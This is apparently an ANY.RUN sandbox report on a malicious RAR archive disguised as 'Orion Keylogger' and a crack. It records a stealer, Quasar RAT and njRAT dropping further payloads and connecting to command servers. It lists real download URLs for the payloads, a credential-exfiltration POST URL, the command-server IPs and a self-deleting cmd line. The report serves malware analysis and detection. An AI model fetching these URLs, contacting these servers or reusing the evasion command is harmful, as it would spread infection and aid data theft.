File name:

1.rar

Full analysis: https://app.any.run/tasks/4262ca31-5989-4978-b122-335591d6c6ea
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 25, 2019, 14:15:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
stealer
evasion
rat
quasar
nanocore
njrat
bladabindi
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

159593552C295DE2270E53402E97A395

SHA1:

57C981167FA9AB4CE80C34675BE9D1CFCC4ACDD3

SHA256:

9FD44D0AE99B882D5942F35AF555E7E4CF99BCFEE2E98EB090A171EDB07EECAF

SSDEEP:

49152:zB7GIrmzwNNUXQbqckFzTCSTk2sNFMg7st81iPnYDzeqi:AxwLSoqJThkT3iwvi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Orion Keylogger.exe (PID: 2252)
      • Crack.exe (PID: 3964)
      • Orion Keylogger.exe (PID: 3516)
      • Client.exe (PID: 2848)
      • sus.exe (PID: 3216)
      • 1.exe (PID: 2532)
      • driver.exe (PID: 956)
      • GoogleUpdate.exe (PID: 3504)
      • GoogleUpdate.exe (PID: 3040)
    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 364)
    • Downloads executable files from the Internet

      • Crack.exe (PID: 3964)
    • Stealing of credential data

      • 1.exe (PID: 2532)
    • Changes the autorun value in the registry

      • sus.exe (PID: 3216)
      • driver.exe (PID: 956)
      • Client.exe (PID: 2848)
    • QUASAR was detected

      • driver.exe (PID: 956)
    • Connects to CnC server

      • driver.exe (PID: 956)
      • GoogleUpdate.exe (PID: 3040)
    • NJRAT was detected

      • GoogleUpdate.exe (PID: 3040)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Orion Keylogger.exe (PID: 2252)
      • Crack.exe (PID: 3964)
      • sus.exe (PID: 3216)
      • Client.exe (PID: 2848)
    • Starts CHOICE.EXE (used to create a delay)

      • cmd.exe (PID: 3184)
    • Creates files in the program directory

      • Crack.exe (PID: 3964)
    • Starts CMD.EXE for commands execution

      • Crack.exe (PID: 3964)
      • 1.exe (PID: 2532)
    • Reads Environment values

      • 1.exe (PID: 2532)
    • Reads the cookies of Google Chrome

      • 1.exe (PID: 2532)
    • Creates files in the user directory

      • sus.exe (PID: 3216)
      • driver.exe (PID: 956)
    • Starts itself from another location

      • sus.exe (PID: 3216)
      • Client.exe (PID: 2848)
    • Connects to unusual port

      • GoogleUpdate.exe (PID: 3040)
      • driver.exe (PID: 956)
    • Checks for external IP

      • driver.exe (PID: 956)
    • Connects to server without host name

      • 1.exe (PID: 2532)
  • INFO

    • Application was crashed

      • Orion Keylogger.exe (PID: 3516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
14
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start winrar.exe no specs searchprotocolhost.exe no specs orion keylogger.exe orion keylogger.exe crack.exe cmd.exe no specs choice.exe no specs 1.exe client.exe sus.exe #QUASAR driver.exe googleupdate.exe no specs #NJRAT googleupdate.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
364"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\System32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
956"C:\Users\admin\AppData\Roaming\driver\driver.exe" -d2C:\Users\admin\AppData\Roaming\driver\driver.exe
sus.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\driver\driver.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2252"C:\Users\admin\Desktop\Orion Keylogger.exe" C:\Users\admin\Desktop\Orion Keylogger.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\orion keylogger.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2532"C:\ProgramData\1.exe" C:\ProgramData\1.exe
Crack.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.17134.1 (WinBuild.160101.0800)
Modules
Images
c:\programdata\1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2848"C:\ProgramData\Client.exe" C:\ProgramData\Client.exe
Crack.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\client.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2860"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3040"C:\Users\admin\AppData\Local\Temp\GoogleUpdate\GoogleUpdate.exe" C:\Users\admin\AppData\Local\Temp\GoogleUpdate\GoogleUpdate.exe
Client.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\googleupdate\googleupdate.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
3184"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "Crack.exe"C:\Windows\System32\cmd.exeCrack.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3216"C:\ProgramData\sus.exe" C:\ProgramData\sus.exe
Crack.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\sus.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3232cmd /c ""C:\Users\admin\AppData\Local\delete.bat" "C:\Windows\system32\cmd.exe1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 988
Read events
1 875
Write events
113
Delete events
0

Modification events

(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2860) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\1.rar
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
1
(PID) Process:(2860) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
Executable files
7
Suspicious files
2
Text files
7
Unknown types
1

Dropped files

PID
Process
Filename
Type
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\Mono.Cecil.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\Newtonsoft.Json.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\Orion Keylogger.exe
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\Ranger.BrowserLogging.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\ranger.browserlogging.vault.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\RedPandaUI.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\961API.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\Booya Theme.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\KeikoObfuscator.dll
MD5:
SHA256:
2860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2860.24572\MintUI.dll
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
7
DNS requests
4
Threats
48

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3964
Crack.exe
GET
200
95.211.16.66:80
http://ssws77.kl.com.ua/s/Client.exe
NL
executable
114 Kb
malicious
2532
1.exe
POST
200
18.224.18.88:80
http://18.224.18.88/t.php?hwid=7463AB4C0661LLED&ci=VDBSVmVrNXFRVE5OZW1zeQ==&p=1&c=6&a=2&f=0&t=0&fz=0&s=0&cr=0&ds=0
US
suspicious
956
driver.exe
GET
200
185.194.141.58:80
http://ip-api.com/json/
DE
text
299 b
malicious
3964
Crack.exe
GET
200
95.211.16.66:80
http://ssws77.kl.com.ua/s/sus.exe
NL
executable
483 Kb
malicious
3964
Crack.exe
GET
200
95.211.16.66:80
http://ssws77.kl.com.ua/s/1.exe
NL
executable
235 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3964
Crack.exe
95.211.16.66:80
ssws77.kl.com.ua
LeaseWeb Netherlands B.V.
NL
malicious
2532
1.exe
216.58.210.4:443
www.google.com
Google Inc.
US
whitelisted
2532
1.exe
18.224.18.88:80
US
suspicious
956
driver.exe
185.194.141.58:80
ip-api.com
netcup GmbH
DE
unknown
956
driver.exe
195.133.146.19:1604
JSC Mediasoft ekspert
RU
malicious
3040
GoogleUpdate.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3040
GoogleUpdate.exe
195.133.146.19:6666
JSC Mediasoft ekspert
RU
malicious

DNS requests

Domain
IP
Reputation
ssws77.kl.com.ua
  • 95.211.16.66
malicious
www.google.com
  • 216.58.210.4
malicious
ip-api.com
  • 185.194.141.58
malicious
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
malicious

Threats

PID
Process
Class
Message
3964
Crack.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3964
Crack.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3964
Crack.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3964
Crack.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3964
Crack.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
3964
Crack.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2532
1.exe
A Network Trojan was detected
MALWARE [PTsecurity] HEUR:Trojan-Spy.MSIL.Stealer.gen
956
driver.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup ip-api.com
956
driver.exe
A Network Trojan was detected
MALWARE [PTsecurity] Quasar 1.3 RAT IP Lookup ip-api.com (HTTP headeer)
956
driver.exe
A Network Trojan was detected
MALWARE [PTsecurity] Quasar RAT
10 ETPRO signatures available at the full report
No debug info